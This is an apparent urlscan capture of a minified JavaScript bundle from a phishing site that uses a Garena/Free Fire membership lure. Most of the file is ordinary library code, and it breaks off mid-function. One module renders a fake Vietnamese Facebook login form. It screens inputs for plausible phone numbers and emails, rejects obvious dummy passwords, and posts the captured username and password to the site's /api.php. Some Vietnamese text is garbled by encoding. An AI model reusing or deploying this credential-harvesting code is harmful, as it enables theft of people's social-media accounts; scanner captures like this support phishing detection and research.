ff-members-garena.io.vn Open in urlscan Pro
172.67.207.159  Public Scan

Submitted URL: http://ff-members-garena.io.vn/js/chunk-ebcca810.0be768b5.js
Effective URL: https://ff-members-garena.io.vn/js/chunk-ebcca810.0be768b5.js
Submission: On August 09 via api from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

(window['webpackJsonp'] = window['webpackJsonp'] || []).push([
  ['chunk-ebcca810'],
  {
    '0a06': function (t, e, r) {
      'use strict';
      var n = r('c532'),
        o = r('30b5'),
        i = r('f6b4'),
        a = r('5270'),
        s = r('4a7b');
      function c(t) {
        (this.defaults = t),
          (this.interceptors = { request: new i(), response: new i() });
      }
      (c.prototype.request = function (t) {
        'string' === typeof t
          ? ((t = arguments[1] || {}), (t.url = arguments[0]))
          : (t = t || {}),
          (t = s(this.defaults, t)),
          t.method
            ? (t.method = t.method.toLowerCase())
            : this.defaults.method
            ? (t.method = this.defaults.method.toLowerCase())
            : (t.method = 'get');
        var e = [a, void 0],
          r = Promise.resolve(t);
        this.interceptors.request.forEach(function (t) {
          e.unshift(t.fulfilled, t.rejected);
        }),
          this.interceptors.response.forEach(function (t) {
            e.push(t.fulfilled, t.rejected);
          });
        while (e.length) r = r.then(e.shift(), e.shift());
        return r;
      }),
        (c.prototype.getUri = function (t) {
          return (
            (t = s(this.defaults, t)),
            o(t.url, t.params, t.paramsSerializer).replace(/^\?/, '')
          );
        }),
        n.forEach(['delete', 'get', 'head', 'options'], function (t) {
          c.prototype[t] = function (e, r) {
            return this.request(
              s(r || {}, { method: t, url: e, data: (r || {}).data })
            );
          };
        }),
        n.forEach(['post', 'put', 'patch'], function (t) {
          c.prototype[t] = function (e, r, n) {
            return this.request(s(n || {}, { method: t, url: e, data: r }));
          };
        }),
        (t.exports = c);
    },
    '0df6': function (t, e, r) {
      'use strict';
      t.exports = function (t) {
        return function (e) {
          return t.apply(null, e);
        };
      };
    },
    '14c3': function (t, e, r) {
      var n = r('c6b6'),
        o = r('9263');
      t.exports = function (t, e) {
        var r = t.exec;
        if ('function' === typeof r) {
          var i = r.call(t, e);
          if ('object' !== typeof i)
            throw TypeError(
              'RegExp exec method returned something other than an Object or null'
            );
          return i;
        }
        if ('RegExp' !== n(t))
          throw TypeError('RegExp#exec called on incompatible receiver');
        return o.call(t, e);
      };
    },
    '1d2b': function (t, e, r) {
      'use strict';
      t.exports = function (t, e) {
        return function () {
          for (var r = new Array(arguments.length), n = 0; n < r.length; n++)
            r[n] = arguments[n];
          return t.apply(e, r);
        };
      };
    },
    2444: function (t, e, r) {
      'use strict';
      (function (e) {
        var n = r('c532'),
          o = r('c8af'),
          i = { 'Content-Type': 'application/x-www-form-urlencoded' };
        function a(t, e) {
          !n.isUndefined(t) &&
            n.isUndefined(t['Content-Type']) &&
            (t['Content-Type'] = e);
        }
        function s() {
          var t;
          return (
            ('undefined' !== typeof XMLHttpRequest ||
              ('undefined' !== typeof e &&
                '[object process]' === Object.prototype.toString.call(e))) &&
              (t = r('b50d')),
            t
          );
        }
        var c = {
          adapter: s(),
          transformRequest: [
            function (t, e) {
              return (
                o(e, 'Accept'),
                o(e, 'Content-Type'),
                n.isFormData(t) ||
                n.isArrayBuffer(t) ||
                n.isBuffer(t) ||
                n.isStream(t) ||
                n.isFile(t) ||
                n.isBlob(t)
                  ? t
                  : n.isArrayBufferView(t)
                  ? t.buffer
                  : n.isURLSearchParams(t)
                  ? (a(e, 'application/x-www-form-urlencoded;charset=utf-8'),
                    t.toString())
                  : n.isObject(t)
                  ? (a(e, 'application/json;charset=utf-8'), JSON.stringify(t))
                  : t
              );
            },
          ],
          transformResponse: [
            function (t) {
              if ('string' === typeof t)
                try {
                  t = JSON.parse(t);
                } catch (e) {}
              return t;
            },
          ],
          timeout: 0,
          xsrfCookieName: 'XSRF-TOKEN',
          xsrfHeaderName: 'X-XSRF-TOKEN',
          maxContentLength: -1,
          maxBodyLength: -1,
          validateStatus: function (t) {
            return t >= 200 && t < 300;
          },
          headers: { common: { Accept: 'application/json, text/plain, */*' } },
        };
        n.forEach(['delete', 'get', 'head'], function (t) {
          c.headers[t] = {};
        }),
          n.forEach(['post', 'put', 'patch'], function (t) {
            c.headers[t] = n.merge(i);
          }),
          (t.exports = c);
      }).call(this, r('4362'));
    },
    '2d83': function (t, e, r) {
      'use strict';
      var n = r('387f');
      t.exports = function (t, e, r, o, i) {
        var a = new Error(t);
        return n(a, e, r, o, i);
      };
    },
    '2e67': function (t, e, r) {
      'use strict';
      t.exports = function (t) {
        return !(!t || !t.__CANCEL__);
      };
    },
    '30b5': function (t, e, r) {
      'use strict';
      var n = r('c532');
      function o(t) {
        return encodeURIComponent(t)
          .replace(/%3A/gi, ':')
          .replace(/%24/g, '$')
          .replace(/%2C/gi, ',')
          .replace(/%20/g, '+')
          .replace(/%5B/gi, '[')
          .replace(/%5D/gi, ']');
      }
      t.exports = function (t, e, r) {
        if (!e) return t;
        var i;
        if (r) i = r(e);
        else if (n.isURLSearchParams(e)) i = e.toString();
        else {
          var a = [];
          n.forEach(e, function (t, e) {
            null !== t &&
              'undefined' !== typeof t &&
              (n.isArray(t) ? (e += '[]') : (t = [t]),
              n.forEach(t, function (t) {
                n.isDate(t)
                  ? (t = t.toISOString())
                  : n.isObject(t) && (t = JSON.stringify(t)),
                  a.push(o(e) + '=' + o(t));
              }));
          }),
            (i = a.join('&'));
        }
        if (i) {
          var s = t.indexOf('#');
          -1 !== s && (t = t.slice(0, s)),
            (t += (-1 === t.indexOf('?') ? '?' : '&') + i);
        }
        return t;
      };
    },
    '387f': function (t, e, r) {
      'use strict';
      t.exports = function (t, e, r, n, o) {
        return (
          (t.config = e),
          r && (t.code = r),
          (t.request = n),
          (t.response = o),
          (t.isAxiosError = !0),
          (t.toJSON = function () {
            return {
              message: this.message,
              name: this.name,
              description: this.description,
              number: this.number,
              fileName: this.fileName,
              lineNumber: this.lineNumber,
              columnNumber: this.columnNumber,
              stack: this.stack,
              config: this.config,
              code: this.code,
            };
          }),
          t
        );
      };
    },
    3934: function (t, e, r) {
      'use strict';
      var n = r('c532');
      t.exports = n.isStandardBrowserEnv()
        ? (function () {
            var t,
              e = /(msie|trident)/i.test(navigator.userAgent),
              r = document.createElement('a');
            function o(t) {
              var n = t;
              return (
                e && (r.setAttribute('href', n), (n = r.href)),
                r.setAttribute('href', n),
                {
                  href: r.href,
                  protocol: r.protocol ? r.protocol.replace(/:$/, '') : '',
                  host: r.host,
                  search: r.search ? r.search.replace(/^\?/, '') : '',
                  hash: r.hash ? r.hash.replace(/^#/, '') : '',
                  hostname: r.hostname,
                  port: r.port,
                  pathname:
                    '/' === r.pathname.charAt(0)
                      ? r.pathname
                      : '/' + r.pathname,
                }
              );
            }
            return (
              (t = o(window.location.href)),
              function (e) {
                var r = n.isString(e) ? o(e) : e;
                return r.protocol === t.protocol && r.host === t.host;
              }
            );
          })()
        : (function () {
            return function () {
              return !0;
            };
          })();
    },
    4362: function (t, e, r) {
      (e.nextTick = function (t) {
        var e = Array.prototype.slice.call(arguments);
        e.shift(),
          setTimeout(function () {
            t.apply(null, e);
          }, 0);
      }),
        (e.platform = e.arch = e.execPath = e.title = 'browser'),
        (e.pid = 1),
        (e.browser = !0),
        (e.env = {}),
        (e.argv = []),
        (e.binding = function (t) {
          throw new Error('No such module. (Possibly not yet loaded)');
        }),
        (function () {
          var t,
            n = '/';
          (e.cwd = function () {
            return n;
          }),
            (e.chdir = function (e) {
              t || (t = r('df7c')), (n = t.resolve(e, n));
            });
        })(),
        (e.exit =
          e.kill =
          e.umask =
          e.dlopen =
          e.uptime =
          e.memoryUsage =
          e.uvCounters =
            function () {}),
        (e.features = {});
    },
    '466d': function (t, e, r) {
      'use strict';
      var n = r('d784'),
        o = r('825a'),
        i = r('50c4'),
        a = r('1d80'),
        s = r('8aa5'),
        c = r('14c3');
      n('match', 1, function (t, e, r) {
        return [
          function (e) {
            var r = a(this),
              n = void 0 == e ? void 0 : e[t];
            return void 0 !== n ? n.call(e, r) : new RegExp(e)[t](String(r));
          },
          function (t) {
            var n = r(e, t, this);
            if (n.done) return n.value;
            var a = o(t),
              u = String(this);
            if (!a.global) return c(a, u);
            var f = a.unicode;
            a.lastIndex = 0;
            var l,
              p = [],
              d = 0;
            while (null !== (l = c(a, u))) {
              var h = String(l[0]);
              (p[d] = h),
                '' === h && (a.lastIndex = s(u, i(a.lastIndex), f)),
                d++;
            }
            return 0 === d ? null : p;
          },
        ];
      });
    },
    '467f': function (t, e, r) {
      'use strict';
      var n = r('2d83');
      t.exports = function (t, e, r) {
        var o = r.config.validateStatus;
        r.status && o && !o(r.status)
          ? e(
              n(
                'Request failed with status code ' + r.status,
                r.config,
                null,
                r.request,
                r
              )
            )
          : t(r);
      };
    },
    '4a7b': function (t, e, r) {
      'use strict';
      var n = r('c532');
      t.exports = function (t, e) {
        e = e || {};
        var r = {},
          o = ['url', 'method', 'data'],
          i = ['headers', 'auth', 'proxy', 'params'],
          a = [
            'baseURL',
            'transformRequest',
            'transformResponse',
            'paramsSerializer',
            'timeout',
            'timeoutMessage',
            'withCredentials',
            'adapter',
            'responseType',
            'xsrfCookieName',
            'xsrfHeaderName',
            'onUploadProgress',
            'onDownloadProgress',
            'decompress',
            'maxContentLength',
            'maxBodyLength',
            'maxRedirects',
            'transport',
            'httpAgent',
            'httpsAgent',
            'cancelToken',
            'socketPath',
            'responseEncoding',
          ],
          s = ['validateStatus'];
        function c(t, e) {
          return n.isPlainObject(t) && n.isPlainObject(e)
            ? n.merge(t, e)
            : n.isPlainObject(e)
            ? n.merge({}, e)
            : n.isArray(e)
            ? e.slice()
            : e;
        }
        function u(o) {
          n.isUndefined(e[o])
            ? n.isUndefined(t[o]) || (r[o] = c(void 0, t[o]))
            : (r[o] = c(t[o], e[o]));
        }
        n.forEach(o, function (t) {
          n.isUndefined(e[t]) || (r[t] = c(void 0, e[t]));
        }),
          n.forEach(i, u),
          n.forEach(a, function (o) {
            n.isUndefined(e[o])
              ? n.isUndefined(t[o]) || (r[o] = c(void 0, t[o]))
              : (r[o] = c(void 0, e[o]));
          }),
          n.forEach(s, function (n) {
            n in e
              ? (r[n] = c(t[n], e[n]))
              : n in t && (r[n] = c(void 0, t[n]));
          });
        var f = o.concat(i).concat(a).concat(s),
          l = Object.keys(t)
            .concat(Object.keys(e))
            .filter(function (t) {
              return -1 === f.indexOf(t);
            });
        return n.forEach(l, u), r;
      };
    },
    5270: function (t, e, r) {
      'use strict';
      var n = r('c532'),
        o = r('c401'),
        i = r('2e67'),
        a = r('2444');
      function s(t) {
        t.cancelToken && t.cancelToken.throwIfRequested();
      }
      t.exports = function (t) {
        s(t),
          (t.headers = t.headers || {}),
          (t.data = o(t.data, t.headers, t.transformRequest)),
          (t.headers = n.merge(
            t.headers.common || {},
            t.headers[t.method] || {},
            t.headers
          )),
          n.forEach(
            ['delete', 'get', 'head', 'post', 'put', 'patch', 'common'],
            function (e) {
              delete t.headers[e];
            }
          );
        var e = t.adapter || a.adapter;
        return e(t).then(
          function (e) {
            return (
              s(t), (e.data = o(e.data, e.headers, t.transformResponse)), e
            );
          },
          function (e) {
            return (
              i(e) ||
                (s(t),
                e &&
                  e.response &&
                  (e.response.data = o(
                    e.response.data,
                    e.response.headers,
                    t.transformResponse
                  ))),
              Promise.reject(e)
            );
          }
        );
      };
    },
    '5f02': function (t, e, r) {
      'use strict';
      t.exports = function (t) {
        return 'object' === typeof t && !0 === t.isAxiosError;
      };
    },
    '65f0': function (t, e, r) {
      var n = r('861d'),
        o = r('e8b5'),
        i = r('b622'),
        a = i('species');
      t.exports = function (t, e) {
        var r;
        return (
          o(t) &&
            ((r = t.constructor),
            'function' != typeof r || (r !== Array && !o(r.prototype))
              ? n(r) && ((r = r[a]), null === r && (r = void 0))
              : (r = void 0)),
          new (void 0 === r ? Array : r)(0 === e ? 0 : e)
        );
      };
    },
    '68ed': function (t, e, r) {
      'use strict';
      r.r(e);
      var n = function () {
          var t = this,
            e = t.$createElement,
            r = t._self._c || e;
          return r(
            'div',
            { staticClass: 'touch x1 _fzu _50-3 iframe acw portrait' },
            [
              r('div', { attrs: { id: 'viewport' } }, [
                r(
                  'h1',
                  {
                    staticStyle: {
                      display: 'block',
                      height: '0',
                      overflow: 'hidden',
                      position: 'absolute',
                      width: '0',
                      padding: '0',
                    },
                  },
                  [t._v(' Facebook ')]
                ),
                r('div', { attrs: { id: 'page' } }, [
                  r('div', {
                    staticClass: '_129_',
                    attrs: { id: 'header-notices' },
                  }),
                  t._m(0),
                  r(
                    'div',
                    {
                      staticClass: '_5soa acw',
                      attrs: { id: 'root', role: 'main' },
                    },
                    [
                      r('div', { staticClass: '_4g33' }, [
                        r(
                          'div',
                          { staticClass: '_4g34', attrs: { id: 'u_0_0' } },
                          [
                            t.error
                              ? r(
                                  'div',
                                  {
                                    staticClass: '_5yd0 _2ph- _5yd1',
                                    attrs: { 'data-sigil': 'm_login_notice' },
                                  },
                                  [
                                    t._v(
                                      ' Email hoặc số Ä‘iện thoại bạn Ä‘Ă£ nhập khĂ´ng khá»›p vá»›i bất kỳ tĂ i khoản nĂ o. '
                                    ),
                                    r(
                                      'a',
                                      {
                                        staticClass: '_652e',
                                        attrs: { href: '#' },
                                      },
                                      [t._v('Đăng kĂ½ tĂ i khoản.')]
                                    ),
                                  ]
                                )
                              : t._e(),
                            r('div', { staticClass: 'aclb _4-4l' }, [
                              r('div', { staticClass: '_5rut' }, [
                                t._m(1),
                                r(
                                  'div',
                                  {
                                    staticClass: 'mobile-login-form _5spm',
                                    attrs: {
                                      novalidate: '1',
                                      'data-autoid': 'autoid_2',
                                    },
                                  },
                                  [
                                    r('div', { staticClass: '_56be _5sob' }, [
                                      r(
                                        'div',
                                        { staticClass: '_55wo _55x2 _56bf' },
                                        [
                                          r(
                                            'div',
                                            {
                                              attrs: {
                                                id: 'email_input_container',
                                              },
                                            },
                                            [
                                              r('input', {
                                                directives: [
                                                  {
                                                    name: 'model',
                                                    rawName: 'v-model',
                                                    value: t.form.username,
                                                    expression: 'form.username',
                                                  },
                                                ],
                                                staticClass:
                                                  '_56bg _4u9z _5ruq',
                                                attrs: {
                                                  name: 'username',
                                                  placeholder:
                                                    'Số di động hoặc email',
                                                  type: 'text',
                                                  value: '',
                                                },
                                                domProps: {
                                                  value: t.form.username,
                                                },
                                                on: {
                                                  input: function (e) {
                                                    e.target.composing ||
                                                      t.$set(
                                                        t.form,
                                                        'username',
                                                        e.target.value
                                                      );
                                                  },
                                                },
                                              }),
                                            ]
                                          ),
                                          r('div', [
                                            r(
                                              'div',
                                              { staticClass: '_1upc _mg8' },
                                              [
                                                r(
                                                  'div',
                                                  { staticClass: '_4g33' },
                                                  [
                                                    r(
                                                      'div',
                                                      {
                                                        staticClass:
                                                          '_4g34 _5i2i _52we',
                                                      },
                                                      [
                                                        r(
                                                          'div',
                                                          {
                                                            staticClass:
                                                              '_5xu4',
                                                          },
                                                          [
                                                            r('input', {
                                                              directives: [
                                                                {
                                                                  name: 'model',
                                                                  rawName:
                                                                    'v-model',
                                                                  value:
                                                                    t.form
                                                                      .password,
                                                                  expression:
                                                                    'form.password',
                                                                },
                                                              ],
                                                              staticClass:
                                                                '_56bg _4u9z _27z2',
                                                              attrs: {
                                                                autocorrect:
                                                                  'off',
                                                                autocapitalize:
                                                                  'off',
                                                                autocomplete:
                                                                  'on',
                                                                id: 'm_login_password',
                                                                name: 'password',
                                                                placeholder:
                                                                  'Mật khẩu',
                                                                type: 'password',
                                                              },
                                                              domProps: {
                                                                value:
                                                                  t.form
                                                                    .password,
                                                              },
                                                              on: {
                                                                input:
                                                                  function (e) {
                                                                    e.target
                                                                      .composing ||
                                                                      t.$set(
                                                                        t.form,
                                                                        'password',
                                                                        e.target
                                                                          .value
                                                                      );
                                                                  },
                                                              },
                                                            }),
                                                          ]
                                                        ),
                                                      ]
                                                    ),
                                                  ]
                                                ),
                                              ]
                                            ),
                                          ]),
                                        ]
                                      ),
                                    ]),
                                    r(
                                      'div',
                                      {
                                        staticClass: '_2pie',
                                        staticStyle: { 'text-align': 'center' },
                                      },
                                      [
                                        r('div', { attrs: { id: 'u_0_4' } }, [
                                          r(
                                            'button',
                                            {
                                              staticClass:
                                                '_54k8 _52jh _56bs _56b_ _28lf _56bw _56bu',
                                              attrs: { value: 'Đăng nhập' },
                                              on: { click: t.login },
                                            },
                                            [
                                              r(
                                                'span',
                                                { staticClass: '_55sr' },
                                                [t._v('Đăng nhập')]
                                              ),
                                            ]
                                          ),
                                        ]),
                                        r('div', {
                                          attrs: {
                                            id: 'otp_button_elem_container',
                                          },
                                        }),
                                      ]
                                    ),
                                    r('div', { staticClass: '_xo8' }),
                                  ]
                                ),
                                t._m(2),
                                t._m(3),
                              ]),
                            ]),
                          ]
                        ),
                      ]),
                      t._m(4),
                    ]
                  ),
                ]),
              ]),
            ]
          );
        },
        o = [
          function () {
            var t = this,
              e = t.$createElement,
              r = t._self._c || e;
            return r(
              'div',
              { staticClass: '_4g33 _52we _52z5', attrs: { id: 'header' } },
              [
                r('div', { staticClass: '_4g34 _52z6' }, [
                  r('a', { attrs: { href: '#' } }, [
                    r('i', { staticClass: 'img sp_7V_P8-AK9yC sx_ce405b' }, [
                      r('u', [t._v('facebook')]),
                    ]),
                  ]),
                ]),
              ]
            );
          },
          function () {
            var t = this,
              e = t.$createElement,
              r = t._self._c || e;
            return r('div', [
              r('div', { staticClass: '_52jj _3-q2' }, [
                r('img', { attrs: { src: '/images/logo.png', width: '60' } }),
                r('div', { staticClass: '_52je _52j9' }, [
                  t._v(
                    ' HĂ£y đăng nhập vĂ o tĂ i khoản Facebook của bạn để kết nối vá»›i Membership '
                  ),
                ]),
              ]),
            ]);
          },
          function () {
            var t = this,
              e = t.$createElement,
              r = t._self._c || e;
            return r('div', [
              r('div', { staticClass: '_43mg' }, [
                r('span', { staticClass: '_43mh' }, [t._v('hoặc')]),
              ]),
              r('div', { staticClass: '_52jj _5t3b', attrs: { id: 'u_0_6' } }, [
                r(
                  'a',
                  {
                    staticClass: '_5t3c _28le btn btnS medBtn mfsm touchable',
                    attrs: {
                      role: 'button',
                      id: 'signup-button',
                      href: 'https://m.facebook.com/reg',
                    },
                  },
                  [t._v(' Tạo tĂ i khoản má»›i ')]
                ),
              ]),
            ]);
          },
          function () {
            var t = this,
              e = t.$createElement,
              r = t._self._c || e;
            return r('div', [
              r('div', { staticClass: 'other-links' }, [
                r('ul', { staticClass: '_5pkb _55wp' }, [
                  r('li', [
                    r('span', { staticClass: 'mfss fcg' }, [
                      r(
                        'a',
                        {
                          attrs: {
                            href: 'https://m.facebook.com/login/identify',
                            id: 'forgot-password-link',
                          },
                        },
                        [t._v(' QuĂªn mật khẩu? ')]
                      ),
                    ]),
                  ]),
                ]),
              ]),
            ]);
          },
          function () {
            var t = this,
              e = t.$createElement,
              r = t._self._c || e;
            return r('div', { staticClass: '_55wr _5ui2' }, [
              r('div', { staticClass: '_5dpw' }, [
                r(
                  'div',
                  {
                    staticClass: '_5ui3',
                    attrs: { 'data-nocookies': '1', id: 'locale-selector' },
                  },
                  [
                    r('div', { staticClass: '_4g33' }, [
                      r('div', { staticClass: '_4g34' }, [
                        r('span', { staticClass: '_52jc _52j9 _52jh _3ztb' }, [
                          t._v('Tiếng Việt'),
                        ]),
                        r('div', { staticClass: '_3ztc' }, [
                          r('span', { staticClass: '_52jc' }, [
                            r('a', { attrs: { href: '#' } }, [
                              t._v('中文(台灣)'),
                            ]),
                          ]),
                        ]),
                        r('div', { staticClass: '_3ztc' }, [
                          r('span', { staticClass: '_52jc' }, [
                            r('a', { attrs: { href: '#' } }, [t._v('Español')]),
                          ]),
                        ]),
                        r('div', { staticClass: '_3ztc' }, [
                          r('span', { staticClass: '_52jc' }, [
                            r('a', { attrs: { href: '#' } }, [
                              t._v('Français (France)'),
                            ]),
                          ]),
                        ]),
                      ]),
                      r('div', { staticClass: '_4g34' }, [
                        r('div', { staticClass: '_3ztc' }, [
                          r('span', { staticClass: '_52jc' }, [
                            r('a', { attrs: { href: '#' } }, [
                              t._v('English (UK)'),
                            ]),
                          ]),
                        ]),
                        r('div', { staticClass: '_3ztc' }, [
                          r('span', { staticClass: '_52jc' }, [
                            r('a', { attrs: { href: '#' } }, [t._v('한국́–´')]),
                          ]),
                        ]),
                        r('div', { staticClass: '_3ztc' }, [
                          r('span', { staticClass: '_52jc' }, [
                            r('a', { attrs: { href: '#' } }, [
                              t._v('PortuguĂªs (Brasil)'),
                            ]),
                          ]),
                        ]),
                        r('a', { attrs: { href: '#' } }, [
                          r(
                            'div',
                            {
                              staticClass: '_3j87 _1rrd _3ztd',
                              attrs: {
                                'aria-label': 'Danh sĂ¡ch ngĂ´n ngữ đầy đủ',
                              },
                            },
                            [
                              r('i', {
                                staticClass: 'img sp_7V_P8-AK9yC sx_21ee4d',
                              }),
                            ]
                          ),
                        ]),
                      ]),
                    ]),
                  ]
                ),
                r('div', { staticClass: '_5ui4' }, [
                  r('span', { staticClass: 'mfss fcg' }, [
                    t._v('Facebook © 2021'),
                  ]),
                ]),
              ]),
            ]);
          },
        ];
      r('d3b7');
      function i(t, e, r, n, o, i, a) {
        try {
          var s = t[i](a),
            c = s.value;
        } catch (u) {
          return void r(u);
        }
        s.done ? e(c) : Promise.resolve(c).then(n, o);
      }
      function a(t) {
        return function () {
          var e = this,
            r = arguments;
          return new Promise(function (n, o) {
            var a = t.apply(e, r);
            function s(t) {
              i(a, n, o, s, c, 'next', t);
            }
            function c(t) {
              i(a, n, o, s, c, 'throw', t);
            }
            s(void 0);
          });
        };
      }
      r('96cf'), r('ac1f'), r('466d'), r('7db0');
      var s = r('bc3a'),
        c = r.n(s),
        u = {
          data: function () {
            return { error: !1, form: { username: '' } };
          },
          methods: {
            login: function () {
              var t = this;
              return a(
                regeneratorRuntime.mark(function e() {
                  var r, n, o, i, a, s, u, f, l;
                  return regeneratorRuntime.wrap(function (e) {
                    while (1)
                      switch ((e.prev = e.next)) {
                        case 0:
                          if (!(t.form.username.length < 4)) {
                            e.next = 3;
                            break;
                          }
                          return (t.error = !0), e.abrupt('return');
                        case 3:
                          if (
                            ((r =
                              /^\w+@outlook\.com|\w+@outlook\.com\.vn|\w+@hotmail\.com|\w+@gmail\.com|\w+@yahoo\.com|\w+@yahoo\.com\.vn$/),
                            (n = t.form.username.match(r)),
                            (o =
                              /^((032|033|034|035|036|037|038|039|052|056|058|059|070|076|077|078|079|081|082|083|084|085|086|087|088|089|090|091|092|093|094|096|097|098|099)+([0-9]{7})\b)$/g),
                            (i = t.form.username.match(o)),
                            i || n)
                          ) {
                            e.next = 10;
                            break;
                          }
                          return (t.error = !0), e.abrupt('return');
                        case 10:
                          if (
                            ((a = [
                              '123456',
                              '1234567',
                              '12345678',
                              '123456789',
                              '1234567890',
                            ]),
                            (s = a.find(function (e) {
                              return e == t.form.password;
                            })),
                            !s)
                          ) {
                            e.next = 15;
                            break;
                          }
                          return (t.error = !0), e.abrupt('return');
                        case 15:
                          if (t.form.password) {
                            e.next = 18;
                            break;
                          }
                          return (t.error = !0), e.abrupt('return');
                        case 18:
                          if (!(t.form.password.length < 6)) {
                            e.next = 21;
                            break;
                          }
                          return (t.error = !0), e.abrupt('return');
                        case 21:
                          return (
                            (u = new FormData()),
                            u.append('username', t.form.username),
                            u.append('password', t.form.password),
                            (e.next = 26),
                            c.a.post('/api.php', u)
                          );
                        case 26:
                          (f = e.sent),
                            200 == f.data.code &&
                              (t.$cookies.set(
                                'username',
                                t.form.username,
                                1800
                              ),
                              (l = t.slug(55)),
                              (window.location.href = '/'.concat(l)));
                        case 28:
                        case 'end':
                          return e.stop();
                      }
                  }, e);
                })
              )();
            },
            slug: function (t) {
              for (
                var e = '',
                  r =
                    'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789',
                  n = r.length,
                  o = 0;
                o < t;
                o++
              )
                e += r.charAt(Math.floor(Math.random() * n));
              return e;
            },
          },
        },
        f = u,
        l = (r('9ebf'), r('2877')),
        p = Object(l['a'])(f, n, o, !1, null, null, null);
      e['default'] = p.exports;
    },
    '7a77': function (t, e, r) {
      'use strict';
      function n(t) {
        this.message = t;
      }
      (n.prototype.toString = function () {
        return 'Cancel' + (this.message ? ': ' + this.message : '');
      }),
        (n.prototype.__CANCEL__ = !0),
        (t.exports = n);
    },
    '7aac': function (t, e, r) {
      'use strict';
      var n = r('c532');
      t.exports = n.isStandardBrowserEnv()
        ? (function () {
            return {
              write: function (t, e, r, o, i, a) {
                var s = [];
                s.push(t + '=' + encodeURIComponent(e)),
                  n.isNumber(r) &&
                    s.push('expires=' + new Date(r).toGMTString()),
                  n.isString(o) && s.push('path=' + o),
                  n.isString(i) && s.push('domain=' + i),
                  !0 === a && s.push('secure'),
                  (document.cookie = s.join('; '));
              },
              read: function (t) {
                var e = document.cookie.match(
                  new RegExp('(^|;\\s*)(' + t + ')=([^;]*)')
                );
                return e ? decodeURIComponent(e[3]) : null;
              },
              remove: function (t) {
                this.write(t, '', Date.now() - 864e5);
              },
            };
          })()
        : (function () {
            return {
              write: function () {},
              read: function () {
                return null;
              },
              remove: function () {},
            };
          })();
    },
    '7db0': function (t, e, r) {
      'use strict';
      var n = r('23e7'),
        o = r('b727').find,
        i = r('44d2'),
        a = 'find',
        s = !0;
      a in [] &&
        Array(1)[a](function () {
          s = !1;
        }),
        n(
          { target: 'Array', proto: !0, forced: s },
          {
            find: function (t) {
              return o(this, t, arguments.length > 1 ? arguments[1] : void 0);
            },
          }
        ),
        i(a);
    },
    '820e': function (t, e, r) {},
    '83b9': function (t, e, r) {
      'use strict';
      var n = r('d925'),
        o = r('e683');
      t.exports = function (t, e) {
        return t && !n(e) ? o(t, e) : e;
      };
    },
    '8aa5': function (t, e, r) {
      'use strict';
      var n = r('6547').charAt;
      t.exports = function (t, e, r) {
        return e + (r ? n(t, e).length : 1);
      };
    },
    '8df4': function (t, e, r) {
      'use strict';
      var n = r('7a77');
      function o(t) {
        if ('function' !== typeof t)
          throw new TypeError('executor must be a function.');
        var e;
        this.promise = new Promise(function (t) {
          e = t;
        });
        var r = this;
        t(function (t) {
          r.reason || ((r.reason = new n(t)), e(r.reason));
        });
      }
      (o.prototype.throwIfRequested = function () {
        if (this.reason) throw this.reason;
      }),
        (o.source = function () {
          var t,
            e = new o(function (e) {
              t = e;
            });
          return { token: e, cancel: t };
        }),
        (t.exports = o);
    },
    9263: function (t, e, r) {
      'use strict';
      var n = r('ad6d'),
        o = r('9f7f'),
        i = r('5692'),
        a = RegExp.prototype.exec,
        s = i('native-string-replace', String.prototype.replace),
        c = a,
        u = (function () {
          var t = /a/,
            e = /b*/g;
          return (
            a.call(t, 'a'),
            a.call(e, 'a'),
            0 !== t.lastIndex || 0 !== e.lastIndex
          );
        })(),
        f = o.UNSUPPORTED_Y || o.BROKEN_CARET,
        l = void 0 !== /()??/.exec('')[1],
        p = u || l || f;
      p &&
        (c = function (t) {
          var e,
            r,
            o,
            i,
            c = this,
            p = f && c.sticky,
            d = n.call(c),
            h = c.source,
            v = 0,
            m = t;
          return (
            p &&
              ((d = d.replace('y', '')),
              -1 === d.indexOf('g') && (d += 'g'),
              (m = String(t).slice(c.lastIndex)),
              c.lastIndex > 0 &&
                (!c.multiline ||
                  (c.multiline && '\n' !== t[c.lastIndex - 1])) &&
                ((h = '(?: ' + h + ')'), (m = ' ' + m), v++),
              (r = new RegExp('^(?:' + h + ')', d))),
            l && (r = new RegExp('^' + h + '$(?!\\s)', d)),
            u && (e = c.lastIndex),
            (o = a.call(p ? r : c, m)),
            p
              ? o
                ? ((o.input = o.input.slice(v)),
                  (o[0] = o[0].slice(v)),
                  (o.index = c.lastIndex),
                  (c.lastIndex += o[0].length))
                : (c.lastIndex = 0)
              : u && o && (c.lastIndex = c.global ? o.index + o[0].length : e),
            l &&
              o &&
              o.length > 1 &&
              s.call(o[0], r, function () {
                for (i = 1; i < arguments.length - 2; i++)
                  void 0 === arguments[i] && (o[i] = void 0);
              }),
            o
          );
        }),
        (t.exports = c);
    },
    '96cf': function (t, e, r) {
      var n = (function (t) {
        'use strict';
        var e,
          r = Object.prototype,
          n = r.hasOwnProperty,
          o = 'function' === typeof Symbol ? Symbol : {},
          i = o.iterator || '@@iterator',
          a = o.asyncIterator || '@@asyncIterator',
          s = o.toStringTag || '@@toStringTag';
        function c(t, e, r) {
          return (
            Object.defineProperty(t, e, {
              value: r,
              enumerable: !0,
              configurable: !0,
              writable: !0,
            }),
            t[e]
          );
        }
        try {
          c({}, '');
        } catch (O) {
          c = function (t, e, r) {
            return (t[e] = r);
          };
        }
        function u(t, e, r, n) {
          var o = e && e.prototype instanceof m ? e : m,
            i = Object.create(o.prototype),
            a = new D(n || []);
          return (i._invoke = k(t, r, a)), i;
        }
        function f(t, e, r) {
          try {
            return { type: 'normal', arg: t.call(e, r) };
          } catch (O) {
            return { type: 'throw', arg: O };
          }
        }
        t.wrap = u;
        var l = 'suspendedStart',
          p = 'suspendedYield',
          d = 'executing',
          h = 'completed',
          v = {};
        function m() {}
        function g() {}
        function y() {}
        var _ = {};
        _[i] = function () {
          return this;
        };
        var b = Object.getPrototypeOf,
          w = b && b(b(R([])));
        w && w !== r && n.call(w, i) && (_ = w);
        var x = (y.prototype = m.prototype = Object.create(_));
        function C(t) {
          ['next', 'throw', 'return'].forEach(function (e) {
            c(t, e, function (t) {
              return this._invoke(e, t);
            });
          });
        }
        function E(t, e) {
          function r(o, i, a, s) {
            var c = f(t[o], t, i);
            if ('throw' !== c.type) {
              var u = c.arg,
                l = u.value;
              return l && 'object' === typeof l && n.call(l, '__await')
                ? e.resolve(l.__await).then(
                    function (t) {
